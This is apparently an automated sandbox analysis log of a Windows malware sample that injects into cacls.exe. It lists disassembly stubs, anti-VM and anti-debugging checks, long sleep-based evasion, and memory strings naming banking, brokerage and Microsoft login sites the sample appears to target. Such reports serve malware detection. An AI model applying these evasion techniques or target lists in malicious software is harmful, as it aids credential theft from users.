                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040ADAF push ebx; retf 6_2_0040AD54
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004035B0 push eax; ret 6_2_004035B2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00404E90 push eax; ret 6_2_00404EA9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F6225F pushad ; ret 6_2_00F627F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F627FA pushad ; ret 6_2_00F627F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F6283D push eax; iretd 6_2_00F62858
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F909AD push ecx; mov dword ptr [esp], ecx6_2_00F909B6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F61368 push eax; iretd 6_2_00F61369
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E225F pushad ; ret 9_2_037E27F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E27FA pushad ; ret 9_2_037E27F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038109AD push ecx; mov dword ptr [esp], ecx9_2_038109B6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E283D push eax; iretd 9_2_037E2858
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E1366 push eax; iretd 9_2_037E1369
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDE7D3 push ds; retf 9_2_00BDE7EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE8844 push FFFFFF8Ah; ret 9_2_00BE8859
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BFAC40 push edi; ret 9_2_00BFAC49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BD779E push ebx; retf 9_2_00BD77A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BD77FC push ebx; retf 9_2_00BD77A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BD18DD push eax; ret 9_2_00BD18F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE5DDE push cs; retf 9_2_00BE5DDF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEDD41 push ds; iretd 9_2_00BEDD5C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEBE41 push ss; iretd 9_2_00BEBE42
                Source: PGK60fNNCZ.exeStatic PE information: section name: .text entropy: 7.791656574415995
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PGK60fNNCZ.exe PID: 7428, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 7040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 8040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 81D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 91D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E rdtsc 6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 9330Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 643Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep count: 9330 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep time: -18660000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep count: 643 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep time: -1286000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe TID: 4036Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEC940 FindFirstFileW,FindNextFileW,FindClose,9_2_00BEC940
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: t577G2K6.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: t577G2K6.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.co.inVMware20,11696492231~
                Source: t577G2K6.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware2
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oft.visualstudio.comVMware20,11696492231x
                Source: t577G2K6.9.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: firefox.exe, 0000000E.00000002.2159872173.0000022BAE2AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJJbkP
                Source: t577G2K6.9.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: t577G2K6.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,116964922J0^
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: t577G2K6.9.drBinary or memory string: discord.comVMware20,11696492231f
                Source: cacls.exe, 00000009.00000002.2550025861.0000000003391000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2550522268.0000000000DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: t577G2K6.9.drBinary or memory string: global block list test formVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: t577G2K6.9.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: t577G2K6.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: t577G2K6.9.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: t577G2K6.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: t577G2K6.9.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696492231n
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Transaction PasswordVMware20,11696492231}
                Source: t577G2K6.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: t577G2K6.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: t577G2K6.9.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,11696492231
                Source: cacls.exe, 00000009.00000002.2556209928.00000000081C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kofamerica.comVMware20,11696492231x
                Source: t577G2K6.9.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: t577G2K6.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: t577G2K6.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: t577G2K6.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E rdtsc 6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00417E43 LdrLoadDll,6_2_00417E43
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8C0F0 mov eax, dword ptr fs:[00000030h]6_2_00F8C0F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD20F0 mov ecx, dword ptr fs:[00000030h]6_2_00FD20F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov eax, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov ecx, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov eax, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov eax, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov ecx, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov eax, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov eax, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov ecx, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov eax, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E10E mov ecx, dword ptr fs:[00000030h]6_2_0103E10E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01050115 mov eax, dword ptr fs:[00000030h]6_2_01050115
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F980E9 mov eax, dword ptr fs:[00000030h]6_2_00F980E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8A0E3 mov ecx, dword ptr fs:[00000030h]6_2_00F8A0E3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103A118 mov ecx, dword ptr fs:[00000030h]6_2_0103A118
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103A118 mov eax, dword ptr fs:[00000030h]6_2_0103A118
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103A118 mov eax, dword ptr fs:[00000030h]6_2_0103A118
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103A118 mov eax, dword ptr fs:[00000030h]6_2_0103A118
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01024144 mov eax, dword ptr fs:[00000030h]6_2_01024144
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01024144 mov eax, dword ptr fs:[00000030h]6_2_01024144
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01024144 mov ecx, dword ptr fs:[00000030h]6_2_01024144
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01024144 mov eax, dword ptr fs:[00000030h]6_2_01024144
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01024144 mov eax, dword ptr fs:[00000030h]6_2_01024144
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F880A0 mov eax, dword ptr fs:[00000030h]6_2_00F880A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01028158 mov eax, dword ptr fs:[00000030h]6_2_01028158
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064164 mov eax, dword ptr fs:[00000030h]6_2_01064164
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064164 mov eax, dword ptr fs:[00000030h]6_2_01064164
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9208A mov eax, dword ptr fs:[00000030h]6_2_00F9208A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01034180 mov eax, dword ptr fs:[00000030h]6_2_01034180
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01034180 mov eax, dword ptr fs:[00000030h]6_2_01034180
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBC073 mov eax, dword ptr fs:[00000030h]6_2_00FBC073
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104C188 mov eax, dword ptr fs:[00000030h]6_2_0104C188
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104C188 mov eax, dword ptr fs:[00000030h]6_2_0104C188
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101019F mov eax, dword ptr fs:[00000030h]6_2_0101019F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101019F mov eax, dword ptr fs:[00000030h]6_2_0101019F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101019F mov eax, dword ptr fs:[00000030h]6_2_0101019F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101019F mov eax, dword ptr fs:[00000030h]6_2_0101019F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F92050 mov eax, dword ptr fs:[00000030h]6_2_00F92050
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010561C3 mov eax, dword ptr fs:[00000030h]6_2_010561C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010561C3 mov eax, dword ptr fs:[00000030h]6_2_010561C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E1D0 mov eax, dword ptr fs:[00000030h]6_2_0100E1D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E1D0 mov eax, dword ptr fs:[00000030h]6_2_0100E1D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0100E1D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E1D0 mov eax, dword ptr fs:[00000030h]6_2_0100E1D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E1D0 mov eax, dword ptr fs:[00000030h]6_2_0100E1D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8A020 mov eax, dword ptr fs:[00000030h]6_2_00F8A020
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8C020 mov eax, dword ptr fs:[00000030h]6_2_00F8C020
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010661E5 mov eax, dword ptr fs:[00000030h]6_2_010661E5
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE016 mov eax, dword ptr fs:[00000030h]6_2_00FAE016
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE016 mov eax, dword ptr fs:[00000030h]6_2_00FAE016
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE016 mov eax, dword ptr fs:[00000030h]6_2_00FAE016
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE016 mov eax, dword ptr fs:[00000030h]6_2_00FAE016
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01014000 mov ecx, dword ptr fs:[00000030h]6_2_01014000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01032000 mov eax, dword ptr fs:[00000030h]6_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC01F8 mov eax, dword ptr fs:[00000030h]6_2_00FC01F8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026030 mov eax, dword ptr fs:[00000030h]6_2_01026030
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016050 mov eax, dword ptr fs:[00000030h]6_2_01016050
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8A197 mov eax, dword ptr fs:[00000030h]6_2_00F8A197
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8A197 mov eax, dword ptr fs:[00000030h]6_2_00F8A197
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8A197 mov eax, dword ptr fs:[00000030h]6_2_00F8A197
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD0185 mov eax, dword ptr fs:[00000030h]6_2_00FD0185
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010280A8 mov eax, dword ptr fs:[00000030h]6_2_010280A8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96154 mov eax, dword ptr fs:[00000030h]6_2_00F96154
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96154 mov eax, dword ptr fs:[00000030h]6_2_00F96154
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8C156 mov eax, dword ptr fs:[00000030h]6_2_00F8C156
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010560B8 mov eax, dword ptr fs:[00000030h]6_2_010560B8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010560B8 mov ecx, dword ptr fs:[00000030h]6_2_010560B8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC0124 mov eax, dword ptr fs:[00000030h]6_2_00FC0124
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010120DE mov eax, dword ptr fs:[00000030h]6_2_010120DE
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010160E0 mov eax, dword ptr fs:[00000030h]6_2_010160E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA02E1 mov eax, dword ptr fs:[00000030h]6_2_00FA02E1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA02E1 mov eax, dword ptr fs:[00000030h]6_2_00FA02E1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA02E1 mov eax, dword ptr fs:[00000030h]6_2_00FA02E1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01068324 mov eax, dword ptr fs:[00000030h]6_2_01068324
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01068324 mov ecx, dword ptr fs:[00000030h]6_2_01068324
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01068324 mov eax, dword ptr fs:[00000030h]6_2_01068324
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01068324 mov eax, dword ptr fs:[00000030h]6_2_01068324
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]6_2_00F9A2C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]6_2_00F9A2C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]6_2_00F9A2C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]6_2_00F9A2C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]6_2_00F9A2C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
